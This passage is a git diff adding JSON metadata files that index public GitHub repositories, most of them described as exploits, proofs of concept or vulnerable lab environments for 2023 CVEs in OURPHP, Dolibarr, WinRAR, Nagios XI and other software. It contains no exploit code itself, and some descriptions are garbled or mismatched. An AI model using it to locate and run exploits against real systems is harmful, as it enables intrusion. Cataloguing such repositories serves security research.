"html_url": "https:\/\/github.com\/libasmon\/Exploite-CVE-2023-30212-Vulnerability", + "description": "Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T06:43:44Z", + "updated_at": "2024-08-12T20:31:30Z", + "pushed_at": "2023-05-27T11:18:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646099095, + "name": "Exploit-the-CVE-2023-30212-vulnerability", + "full_name": "libas7994\/Exploit-the-CVE-2023-30212-vulnerability", + "owner": { + "login": "libas7994", + "id": 134738008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134738008?v=4", + "html_url": "https:\/\/github.com\/libas7994", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libas7994\/Exploit-the-CVE-2023-30212-vulnerability", + "description": "Vulnerable Docker Environment CVE-2023-30212", + "fork": false, + "created_at": "2023-05-27T09:29:41Z", + "updated_at": "2023-05-27T09:29:42Z", + "pushed_at": "2023-05-27T09:29:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646104862, + "name": "Exploite-CVE-2023-30212-vulnerability", + "full_name": "libasv\/Exploite-CVE-2023-30212-vulnerability", + "owner": { + "login": "libasv", + "id": 134776195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134776195?v=4", + "html_url": "https:\/\/github.com\/libasv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libasv\/Exploite-CVE-2023-30212-vulnerability", + "description": "Exploit-the-CVE-2023-30212-vulnerability", + "fork": false, + "created_at": "2023-05-27T09:52:54Z", + "updated_at": "2023-05-27T11:39:15Z", + "pushed_at": "2023-05-27T11:34:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646738492, + "name": "CVE-2023-30212", + "full_name": "kai-iszz\/CVE-2023-30212", + "owner": { + "login": "kai-iszz", + "id": 134775469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134775469?v=4", + "html_url": "https:\/\/github.com\/kai-iszz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kai-iszz\/CVE-2023-30212", + "description": null, + "fork": false, + "created_at": "2023-05-29T08:23:34Z", + "updated_at": "2023-05-29T08:23:35Z", + "pushed_at": "2023-05-29T08:41:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 655408234, + "name": "CVE-2023-30212-OURPHP-Vulnerability", + "full_name": "MaThEw-ViNcEnT\/CVE-2023-30212-OURPHP-Vulnerability", + "owner": { + "login": "MaThEw-ViNcEnT", + "id": 86392543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86392543?v=4", + "html_url": "https:\/\/github.com\/MaThEw-ViNcEnT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaThEw-ViNcEnT\/CVE-2023-30212-OURPHP-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-06-18T19:56:09Z", + "updated_at": "2023-06-18T19:56:10Z", + "pushed_at": "2023-06-19T17:52:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 655807329, + "name": "CVE-2023-30212-POC", + "full_name": "arunsnap\/CVE-2023-30212-POC", + "owner": { + "login": "arunsnap", + "id": 106102148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106102148?v=4", + "html_url": "https:\/\/github.com\/arunsnap", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arunsnap\/CVE-2023-30212-POC", + "description": null, + "fork": false, + "created_at": "2023-06-19T16:30:05Z", + "updated_at": "2023-06-19T16:30:06Z", + "pushed_at": "2023-06-20T18:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656103481, + "name": "Vulnerable-Docker--CVE-2023-30212-", + "full_name": "VisDev23\/Vulnerable-Docker--CVE-2023-30212-", + "owner": { + "login": "VisDev23", + "id": 110278049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110278049?v=4", + "html_url": "https:\/\/github.com\/VisDev23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VisDev23\/Vulnerable-Docker--CVE-2023-30212-", + "description": "This contains the necessary files and Docker to replicate A vulnerability in OURPHP that has a XSS Vulnerability (CVE-2023-30212)", + "fork": false, + "created_at": "2023-06-20T09:08:38Z", + "updated_at": "2024-04-13T07:20:35Z", + "pushed_at": "2023-06-21T06:16:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656147934, + "name": "CVE-2023-30212", + "full_name": "AAsh035\/CVE-2023-30212", + "owner": { + "login": "AAsh035", + "id": 136836668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136836668?v=4", + "html_url": "https:\/\/github.com\/AAsh035", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AAsh035\/CVE-2023-30212", + "description": null, + "fork": false, + "created_at": "2023-06-20T10:50:30Z", + "updated_at": "2023-06-20T11:17:35Z", + "pushed_at": "2023-06-21T04:48:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656182607, + "name": "Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-", + "full_name": "JasaluRah\/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-", + "owner": { + "login": "JasaluRah", + "id": 136897118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136897118?v=4", + "html_url": "https:\/\/github.com\/JasaluRah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JasaluRah\/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-", + "description": null, + "fork": false, + "created_at": "2023-06-20T12:20:20Z", + "updated_at": "2023-06-20T13:01:30Z", + "pushed_at": "2023-06-20T13:37:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30226.json b/2023/CVE-2023-30226.json new file mode 100644 index 0000000000..9c2d56ff5e --- /dev/null +++ b/2023/CVE-2023-30226.json @@ -0,0 +1,33 @@ +[ + { + "id": 664045595, + "name": "CVE-2023-30226", + "full_name": "ifyGecko\/CVE-2023-30226", + "owner": { + "login": "ifyGecko", + "id": 26214995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26214995?v=4", + "html_url": "https:\/\/github.com\/ifyGecko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifyGecko\/CVE-2023-30226", + "description": "rizin denial of service bug", + "fork": false, + "created_at": "2023-07-08T19:14:30Z", + "updated_at": "2023-07-08T20:21:55Z", + "pushed_at": "2023-07-08T20:20:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30253.json b/2023/CVE-2023-30253.json new file mode 100644 index 0000000000..f1ccfa683d --- /dev/null +++ b/2023/CVE-2023-30253.json @@ -0,0 +1,223 @@ +[ + { + "id": 806179763, + "name": "cve-2023-30253", + "full_name": "Rubikcuv5\/cve-2023-30253", + "owner": { + "login": "Rubikcuv5", + "id": 47946047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4", + "html_url": "https:\/\/github.com\/Rubikcuv5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubikcuv5\/cve-2023-30253", + "description": "Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: v1.0.144 allows directory traversal in the website component", + "fork": false, + "created_at": "2023-08-14T06:18:48Z", + "updated_at": "2024-10-30T16:06:29Z", + "pushed_at": "2024-10-30T16:06:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40361.json b/2023/CVE-2023-40361.json new file mode 100644 index 0000000000..e0d667ad6f --- /dev/null +++ b/2023/CVE-2023-40361.json @@ -0,0 +1,33 @@ +[ + { + "id": 705558213, + "name": "CVE-2023-40361", + "full_name": "vianic\/CVE-2023-40361", + "owner": { + "login": "vianic", + "id": 61748137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61748137?v=4", + "html_url": "https:\/\/github.com\/vianic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vianic\/CVE-2023-40361", + "description": "Security Vulnerability - SECUDOS Qiata", + "fork": false, + "created_at": "2023-10-16T08:49:25Z", + "updated_at": "2023-10-16T08:49:25Z", + "pushed_at": "2023-10-16T10:38:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40362.json b/2023/CVE-2023-40362.json new file mode 100644 index 0000000000..7daa62d2f3 --- /dev/null +++ b/2023/CVE-2023-40362.json @@ -0,0 +1,33 @@ +[ + { + "id": 683251677, + "name": "CVE-2023-40362", + "full_name": "ally-petitt\/CVE-2023-40362", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-40362", + "description": "CVE-2023-40362 Vulnerabilitiy details and proof of concept", + "fork": false, + "created_at": "2023-08-26T01:35:43Z", + "updated_at": "2023-12-26T17:07:13Z", + "pushed_at": "2023-12-25T02:40:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40404.json b/2023/CVE-2023-40404.json new file mode 100644 index 0000000000..7927a6bf2c --- /dev/null +++ b/2023/CVE-2023-40404.json @@ -0,0 +1,50 @@ +[ + { + "id": 865477756, + "name": "GenEtherExploit", + "full_name": "geniuszly\/GenEtherExploit", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/GenEtherExploit", + "description": "is a PoC exploit for the macOS vulnerability CVE-2023-40404. This PoC leverages IOKit APIs to interact with the IOUserEthernetResource network service, manipulating the system's network interfaces", + "fork": false, + "created_at": "2024-09-30T15:41:14Z", + "updated_at": "2024-10-06T16:40:51Z", + "pushed_at": "2024-09-30T15:42:32Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockchain-security", + "cve", + "cve-2023-40404", + "cybersecurity", + "ethernet", + "ethical-hacking", + "exploit", + "genetherexploit", + "iokit", + "iouser", + "penetration-testing", + "poc", + "security", + "smart-contracts", + "vulnerability", + "web3" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40429.json b/2023/CVE-2023-40429.json new file mode 100644 index 0000000000..88d9b5e90a --- /dev/null +++ b/2023/CVE-2023-40429.json @@ -0,0 +1,33 @@ +[ + { + "id": 702720524, + "name": "cve-2023-40429-ez-device-name", + "full_name": "biscuitehh\/cve-2023-40429-ez-device-name", + "owner": { + "login": "biscuitehh", + "id": 507442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/507442?v=4", + "html_url": "https:\/\/github.com\/biscuitehh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biscuitehh\/cve-2023-40429-ez-device-name", + "description": "CVE-2023-40429: An app may be able to access sensitive user data.", + "fork": false, + "created_at": "2023-10-09T21:52:56Z", + "updated_at": "2025-01-02T03:19:02Z", + "pushed_at": "2023-10-09T22:21:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40459.json b/2023/CVE-2023-40459.json new file mode 100644 index 0000000000..95188aeba6 --- /dev/null +++ b/2023/CVE-2023-40459.json @@ -0,0 +1,64 @@ +[ + { + "id": 750832697, + "name": "CVE-2023-40459", + "full_name": "majidmc2\/CVE-2023-40459", + "owner": { + "login": "majidmc2", + "id": 33040588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33040588?v=4", + "html_url": "https:\/\/github.com\/majidmc2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/majidmc2\/CVE-2023-40459", + "description": "PoC of CVE-2023-40459 (DoS on ACEmanager)", + "fork": false, + "created_at": "2024-01-31T12:11:34Z", + "updated_at": "2024-02-08T15:59:49Z", + "pushed_at": "2024-02-03T07:33:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860972880, + "name": "CVE-2023-40459", + "full_name": "7h3w4lk3r\/CVE-2023-40459", + "owner": { + "login": "7h3w4lk3r", + "id": 61451071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61451071?v=4", + "html_url": "https:\/\/github.com\/7h3w4lk3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7h3w4lk3r\/CVE-2023-40459", + "description": "CVE-2023-40459 Unauthenticated DoS PoC Exploit ", + "fork": false, + "created_at": "2024-09-21T16:53:59Z", + "updated_at": "2024-11-21T08:24:47Z", + "pushed_at": "2024-11-21T08:24:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40477.json b/2023/CVE-2023-40477.json new file mode 100644 index 0000000000..b8146da62e --- /dev/null +++ b/2023/CVE-2023-40477.json @@ -0,0 +1,64 @@ +[ + { + "id": 684635082, + "name": "Scan_WinRAR", + "full_name": "winkler-winsen\/Scan_WinRAR", + "owner": { + "login": "winkler-winsen", + "id": 43114182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43114182?v=4", + "html_url": "https:\/\/github.com\/winkler-winsen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/winkler-winsen\/Scan_WinRAR", + "description": "Scan for WinRAR files affected to CVE-2023-40477", + "fork": false, + "created_at": "2023-08-29T14:41:58Z", + "updated_at": "2023-08-29T14:44:09Z", + "pushed_at": "2023-08-29T14:44:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 684680824, + "name": "Winrar-CVE-2023-40477-POC", + "full_name": "wildptr-io\/Winrar-CVE-2023-40477-POC", + "owner": { + "login": "wildptr-io", + "id": 130668432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130668432?v=4", + "html_url": "https:\/\/github.com\/wildptr-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wildptr-io\/Winrar-CVE-2023-40477-POC", + "description": "CVE-2023-40477 PoC by Wild-Pointer", + "fork": false, + "created_at": "2023-08-29T16:29:48Z", + "updated_at": "2024-07-30T16:14:48Z", + "pushed_at": "2023-08-30T14:34:32Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 25, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40600.json b/2023/CVE-2023-40600.json new file mode 100644 index 0000000000..8c6434f40d --- /dev/null +++ b/2023/CVE-2023-40600.json @@ -0,0 +1,33 @@ +[ + { + "id": 721296341, + "name": "CVE-2023-40600", + "full_name": "RandomRobbieBF\/CVE-2023-40600", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-40600", + "description": "EWWW Image Optimizer <= 7.2.0 - Unauthenticated Sensitive Information Exposure via Debug Log", + "fork": false, + "created_at": "2023-11-20T19:05:50Z", + "updated_at": "2023-11-20T19:05:51Z", + "pushed_at": "2023-11-20T19:06:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40626.json b/2023/CVE-2023-40626.json new file mode 100644 index 0000000000..f685f7b900 --- /dev/null +++ b/2023/CVE-2023-40626.json @@ -0,0 +1,39 @@ +[ + { + "id": 725270431, + "name": "Joomla-3.10.12-languagehelper-hotfix", + "full_name": "TLWebdesign\/Joomla-3.10.12-languagehelper-hotfix", + "owner": { + "login": "TLWebdesign", + "id": 4402824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4402824?v=4", + "html_url": "https:\/\/github.com\/TLWebdesign", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TLWebdesign\/Joomla-3.10.12-languagehelper-hotfix", + "description": "Plugin to fix security vulnerability CVE-2023-40626 in Joomla 3.10.12", + "fork": false, + "created_at": "2023-11-29T19:46:15Z", + "updated_at": "2024-05-20T11:38:12Z", + "pushed_at": "2024-02-21T01:11:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-40626", + "joomla", + "joomla3", + "php", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40868.json b/2023/CVE-2023-40868.json new file mode 100644 index 0000000000..9090d3bc6d --- /dev/null +++ b/2023/CVE-2023-40868.json @@ -0,0 +1,33 @@ +[ + { + "id": 686179384, + "name": "CVE-2023-40868", + "full_name": "MinoTauro2020\/CVE-2023-40868", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-40868", + "description": " Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.", + "fork": false, + "created_at": "2023-09-02T00:24:22Z", + "updated_at": "2023-09-02T00:24:23Z", + "pushed_at": "2023-09-02T00:39:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40869.json b/2023/CVE-2023-40869.json new file mode 100644 index 0000000000..1838e07060 --- /dev/null +++ b/2023/CVE-2023-40869.json @@ -0,0 +1,33 @@ +[ + { + "id": 686183183, + "name": "CVE-2023-40869", + "full_name": "MinoTauro2020\/CVE-2023-40869", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-40869", + "description": " Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions", + "fork": false, + "created_at": "2023-09-02T00:47:37Z", + "updated_at": "2023-09-02T00:47:37Z", + "pushed_at": "2023-09-02T00:58:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40924.json b/2023/CVE-2023-40924.json new file mode 100644 index 0000000000..0b4b73891c --- /dev/null +++ b/2023/CVE-2023-40924.json @@ -0,0 +1,33 @@ +[ + { + "id": 678880382, + "name": "CVE-2023-40924", + "full_name": "Yobing1\/CVE-2023-40924", + "owner": { + "login": "Yobing1", + "id": 135513064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135513064?v=4", + "html_url": "https:\/\/github.com\/Yobing1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yobing1\/CVE-2023-40924", + "description": "SolarView vuln", + "fork": false, + "created_at": "2023-08-15T15:44:58Z", + "updated_at": "2023-11-30T09:08:49Z", + "pushed_at": "2023-09-09T01:48:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40930.json b/2023/CVE-2023-40930.json new file mode 100644 index 0000000000..94fd945dd8 --- /dev/null +++ b/2023/CVE-2023-40930.json @@ -0,0 +1,33 @@ +[ + { + "id": 688584647, + "name": "CVE-2023-40930", + "full_name": "NSnidie\/CVE-2023-40930", + "owner": { + "login": "NSnidie", + "id": 88715174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88715174?v=4", + "html_url": "https:\/\/github.com\/NSnidie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NSnidie\/CVE-2023-40930", + "description": " CVE-2023-40930 Repetition Enviroment", + "fork": false, + "created_at": "2023-09-07T16:50:02Z", + "updated_at": "2023-09-13T03:11:12Z", + "pushed_at": "2023-09-07T17:15:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40931.json b/2023/CVE-2023-40931.json new file mode 100644 index 0000000000..cfc7594824 --- /dev/null +++ b/2023/CVE-2023-40931.json @@ -0,0 +1,64 @@ +[ + { + "id": 792582569, + "name": "CVE-2023-40931-PoC", + "full_name": "sealldeveloper\/CVE-2023-40931-PoC", + "owner": { + "login": "sealldeveloper", + "id": 120470330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4", + "html_url": "https:\/\/github.com\/sealldeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2023-40931-PoC", + "description": "The sqlmap payload to exploit CVE-2023-40931", + "fork": false, + "created_at": "2024-04-27T01:42:23Z", + "updated_at": "2024-06-06T07:25:30Z", + "pushed_at": "2024-04-27T01:43:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 910233906, + "name": "Nagios-XI-s-CVE-2023-40931-Exploit", + "full_name": "datboi6942\/Nagios-XI-s-CVE-2023-40931-Exploit", + "owner": { + "login": "datboi6942", + "id": 53870885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53870885?v=4", + "html_url": "https:\/\/github.com\/datboi6942", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/datboi6942\/Nagios-XI-s-CVE-2023-40931-Exploit", + "description": "An exploit for Nagios SQL injection vulnerbility ", + "fork": false, + "created_at": "2024-12-30T18:44:34Z", + "updated_at": "2024-12-30T18:46:40Z", + "pushed_at": "2024-12-30T18:46:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40933.json b/2023/CVE-2023-40933.json new file mode 100644 index 0000000000..99d6267300 --- /dev/null +++ b/2023/CVE-2023-40933.json @@ -0,0 +1,33 @@ +[ + { + "id": 792583023, + "name": "CVE-2023-40933-PoC", + "full_name": "sealldeveloper\/CVE-2023-40933-PoC", + "owner": { + "login": "sealldeveloper", + "id": 120470330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4", + "html_url": "https:\/\/github.com\/sealldeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2023-40933-PoC", + "description": "The sqlmap payload to exploit CVE-2023-40933", + "fork": false, + "created_at": "2024-04-27T01:44:44Z", + "updated_at": "2024-04-27T01:46:43Z", + "pushed_at": "2024-04-27T01:46:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40989.json b/2023/CVE-2023-40989.json new file mode 100644 index 0000000000..1ca72a3e50 --- /dev/null +++ b/2023/CVE-2023-40989.json @@ -0,0 +1,33 @@ +[ + { + "id": 694154973, + "name": "CVE-2023-40989", + "full_name": "Zone1-Z\/CVE-2023-40989", + "owner": { + "login": "Zone1-Z", + "id": 145569866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145569866?v=4", + "html_url": "https:\/\/github.com\/Zone1-Z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zone1-Z\/CVE-2023-40989", + "description": "SQL injection vulnerbility in jeecgboot jeecg-boot v. allows a remote attacker to execute arbitrary code via a crafted request to the report\/jeecgboot\/jmreport\/queryFieldBySql component.", + "fork": false, + "created_at": "2023-09-20T12:43:23Z", + "updated_at": "2023-09-20T12:43:23Z", + "pushed_at": "2023-09-22T07:19:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline 